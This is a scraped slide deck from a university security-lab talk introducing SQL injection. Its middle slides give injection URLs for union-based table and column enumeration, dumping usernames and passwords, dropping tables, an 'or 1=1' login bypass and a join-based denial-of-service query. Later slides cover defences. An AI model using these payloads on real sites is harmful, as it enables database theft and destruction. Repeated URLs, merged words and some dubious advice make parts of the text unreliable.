A brief Intorduction in SQL Injection

7/28/2019 A brief Intorduction in SQL Injection

1/22

Security Lab, University Putra Malaysia

23 May 2013

Sina Manavi

Contact:http://sinamanavi.blogspot.com/p/about-me.html
http://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.htmlhttp://sinamanavi.blogspot.com/p/about-me.html


2/22

Introduction

Why SQL Injection

What is needed for this

What you can do with SQL Injection What are its pros and cons

Why we need to know and how we can prevent ourdatabase from SQL injection attacks


3/22

We are all familiar with SQL Language

One of the technology that helped in converting the static

web to dynamic one

SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc.

SQL Injection means manipulate SQL tables withunauthorized access


4/22


5/22

SQL Injection may happen only two form of UIbased or URL based (1) Injecting into a form. Such as username and

password boxes on a login page.

(2) Injecting into a URL. Likehttp://yourtarget.com/products/list.php?pid=10


6/22

Simple example:

Select ID from tbl_users Where ID=Uid and pass=pass

If it returns any value means that the current inputsare correct


7/22

www.yourtarget.com/list?id=5

if you want to view a record from a table by

the URL based injection:Select * from tbl_usersWhere id=5


8/22

The "INFORMATION_SCHEMA" holds thenames of every table and column on a site, itsname will never change. Tables holding all the tables name:

"INFORMATION_SCHEMA.TABLES.

Tables holding all the Column name:

"INFORMATION_SCHEMA.COLUMNS.


9/22

Finding the URL quantity: www.yourtarget.com/list.php? ID=10+ORDER+BY+1--Increase the 1 , until you got error, then the last number isthe column number

Finding Table name www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--

And it shows:tbl_user

To Be continued
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--


10/22

Now its time to find out the Column names:www.yourtarget.com/list.php? ID=

-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=tbl_user'--

The result would be as following :

id,username,password

Column names finding step:www.yourtarget.com/list.php? ID=

-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'

Try the columns name until you find your target (e.g username,password, or login)
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--


11/22

And Finally its time to see the records: www.yourtarget.com/list.php?=-1+UNION+SELECT+1,username,3+FROM+UserAccounts

And www.yourtarget.com/list.php?=-1+UNION+SELECT+1,password,3+FROM+UserAccounts Username=admin password=123456

Stupid admin ha ;)
http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--http://www.yourtarget.com/news.asp?ArticleID=10+ORDER+BY+1--


12/22

Now we can Alter the records as well, letsrock

UPDATE tbl_user

SET password = SHA2('$password')

WHERE id = $id

Or we can Insert a new user with Insert

Command


13/22

If user_list contains 1000 records then, the databaseis fired up

SELECT * FROM user_list JOIN user_list

JOIN user_list JOIN user_list JOIN user_listJOIN user_list


14/22

Insert newuser into tbl_user

The maliciouse code can be :

DROP table tbl_user


15/22

How it worksSelect * from tbl_users

Where id=Fname and pass=pass

Malicious Code:

SELECT * FROM table WHEREid= Fname' or '1'='1';if(mysql_num_rows($result))

//do login

Now the unauthorized user get accessed easily andbypassed the authorization


16/22

Security is the developersjob No database, connector, or framework

can prevent SQL injection all the time


17/22

Implement proper Error Handling. This wouldinclude using a single error message for all errors.

Lock down User Database configuration, Specify

users, roles and permissions etc.

prefix and append a quote to all user input, even ifthe data is numeric .


18/22


19/22

Vipin Samar, Oracle vice president of DatabaseSecurity:

Database Firewall is a good first layer ofdefense for databases but it won't protect youfrom everything,


20/22

Using Stroprocedures:CREATE PROCEDURE SP_show_user(IN U_ID)

BEGIN

SELECT * FROM Bugs WHERE User_ID= U_ID;

END

CALL SP_show_user(54)

Might be helpful but still vulnerable


21/22

I dont have to worry anymore Escaping is the fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fix SQL privileges are the fix My app doesnt need security Frameworks are the fix Parameters quote for you Parameters are the fix Parameters make queries slow SQL proxies are the fix NoSQL databases are the fix


22/22

NoSQL databases are immune to SQL injection.

Documents

A brief Intorduction in SQL Injection